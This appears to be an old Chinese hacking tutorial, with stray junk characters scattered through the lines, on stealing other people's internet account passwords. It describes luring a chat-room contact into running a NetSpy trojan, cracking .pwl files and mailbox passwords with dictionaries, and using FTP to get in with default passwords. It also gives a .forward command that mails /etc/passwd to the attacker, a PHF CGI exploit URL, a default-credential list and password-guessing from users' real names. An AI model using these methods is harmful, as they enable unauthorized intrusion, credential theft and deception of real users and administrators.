如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。
. S# Y2 B4 Z& M6 f: U方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。
7 D0 P9 L0 D a+ g9 K4 Q优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......5 R; j0 Q9 \: o* j& I4 Q' P8 G
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。
/ g- u! _3 U0 r, h. L) _( U5 y: c提示:先问清你的目标和你是不是在一个城市。" K, F U; r! h
实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。
3 S( S0 |# h; t) @3 t2 ?哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。3 m" y* @ L9 n
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。- e, w( b" M" ?9 o' P/ w
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客* ?4 _/ _9 Y( U
优点:没什么优点+ Z9 g6 o w: l2 C, e7 _3 h H* Q
缺点:要具体情况具体对待,太麻烦6 J2 N4 c$ d6 K) N
提示:平时多多留神。
. w% i7 r1 A4 t5 ]1 T' o. X& v譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
) ^" s5 G6 [: R% M" y% I' Y/ K密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。
* R, `9 c4 U! f7 ~/ y: m6 e运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破
2 b n t9 ?& j |* } K' S3 [2 C q方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。2 x$ v: X% E2 Y3 A/ N$ a1 v
优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。' v" Y! U+ r4 x M( M5 u
缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。
6 X; Y" \( @: W; u3 h1 T, F由于介绍此类的教学文章比较多,我就不班门弄斧了。 " P% g$ h. _7 c/ Y
( N9 h+ o+ w" s U' i6 u
哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。/ ?, q; \; F$ X: z: j
只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。9 r- M" ^( ? N# q! g
有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:
: t; c; ] L9 T/ @) D
4 q6 e- M: \7 ?- ~7 U' `% U+ j------------------------------2 r7 z# `, ^0 l U: Q
: A: V# ]; i4 N! `; XXXX,你好(XX是你在表格上填的名字)
/ L4 ]6 \; T7 Y7 m7 {6 W你在XX热线的主页空间已开通
& f* ~& Z+ P: t' H k帐户名:XXX 密码:11
) }' T$ A- K9 p" J a-----------XX热线1 {) L2 w6 @5 _$ `0 i) r
电话:XXXX-XXXXXXXX) h/ N5 Y! O) j: [' k
------------------------------7 e) ~) X4 x. W6 [- i5 Z
5 X( g6 E. s; [. Z
好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
/ b7 b; `- k1 f! }" S7 l开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。
# c: o P7 c" t上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!
! W6 o h& V; G# u! x- f- s 9 ]1 P [/ z1 _0 l
& z+ A4 G; I+ y- g1 X 如何获得第一个帐号/ V( f7 t0 r" u/ J' L
; X2 K0 l. ]) e, Y) u
我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
9 z; P9 h# e( ]* i
3 v6 T- h% c6 U确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。6 x5 e. ]% z E: e
/ Y2 c- R8 b+ T8 i7 w9 ]如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用." r; g. g8 M+ y+ w' I7 h) F
# m# t0 m E6 g6 R2 ^/ A: b以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<
" B; G% A6 K. t: e
9 [, c" v. y. }/ o7 N+ _! l还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!
5 p) D" E( R& E. D, z) H
/ h1 T9 l7 C0 I4 s很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:8 C) H: D+ S+ |! X3 V6 D
: q. h, P6 q$ W5 X% C Y1 A
帐号 密码
* w# D; D" l. A8 o I' y1 O3 s----------- ----------------
9 y) k7 K- l7 \- q8 {$ i, q+ w0 X6 ^9 kroot root
1 e& m2 w6 {9 u8 O% X: g4 Zsys sys/system/bin. F% B% \3 G# W
bin sys/bin
5 h |3 [& Z0 n" s7 F! Emountfsys mountfsys2 _9 u0 [& ]/ ]5 E8 J6 J7 _
adm adm
' }: s, A2 k; S+ Wuucp uucp1 h$ F* @5 U- Q& G+ e2 w# H
nuucp anon9 M% a4 j) h/ k" t p2 S) d7 i
anon anon
& Z3 Y3 I! f1 d: i0 s' L; Xuser user
U0 D( u1 {7 ?; Y! ~games games
- a- P' h2 _0 s, Yinstall install
3 R; J9 G4 f2 I, K6 _reboot 给 "command login" 用的
$ i7 f4 x% K- N1 p, O" G' [6 pdemo demo
# y8 R6 K6 R( [+ w/ Eumountfsys umountfsys7 H) e* m! E- M0 ^: @" @
sync sync
7 x5 Y4 |% A6 U, A) }9 g/ G% fadmin admin9 d3 I5 E% o. f6 Q: j
guest guest' h! C7 r7 z* S) W4 Q
daemon daemon
! V5 g" i. D" b P0 ^4 v; r________________________________________________________________. T$ r% {) M/ N; @" e) N
0 H4 q% T# e5 j$ p9 B. o7 n( e% t
有些管理员忘记把他们改掉,那你就发财了!
: ?- I$ C: h3 x# S+ X
2 l0 L" M2 K; ]3 T( K# s另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.& `2 L$ G" Z4 @6 {, l2 U/ `
8 i2 D( Y7 T& B, u, S只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:; ]7 g4 ?4 E1 d( v; h
1 W! u2 P4 k9 R C3 Q( i
.........+ T" C/ e+ j! T
9 S$ P! ^/ h" xxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
2 `. y" H4 o$ i/ h* ?6 n; j) C# p4 a) \% u& z! ~' W
qingyuan:x:275:50::/usr/qingyuan:/bin/sh0 D1 f3 F0 O7 `4 j5 }
' f5 ?% X5 j+ Rhjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh) }5 s5 U4 d& A$ k5 K
8 C% ]) U, w$ M7 d# vsmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
* K) z; q5 K3 a* o% A; k8 ~+ o
4 l, {* C) v% J r% L) bkyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
+ @& h0 A0 I& G& M% @$ D
0 q, H5 w) Y `! x/ ^4 vbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh# H! u% Q) x, ~9 F" ]; V v7 T
4 G8 c9 b: ` _' L% r* Ctide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
q/ M; s2 v% e' t* u
+ O# Z$ A) m/ q............
& Q: M+ ^( Z5 A7 I/ [9 D
* k2 _5 }& T7 b! Q# U$ y$ ~这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.: _1 }( u4 `# t# \$ _
3 t7 f; _0 i) g3 q: f如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.
4 B2 B; d8 s$ J& z; ~1 P
: s( i2 X* b/ q& K9 ^当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.
. u* a3 z j7 L1 |0 T7 p
6 u0 j B) X$ c( L* k7 k1 {如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好. h1 R' Q( t; [9 P+ ?+ e$ Y- R
( u, b6 j/ H, S7 p" V" f最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.9 x3 Q0 P: k' f& d
6 v, n4 U) o: {5 C3 H' V. L
你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.
: D5 z- X9 A- G% f" D0 L5 b4 L @& G8 h9 t- `
|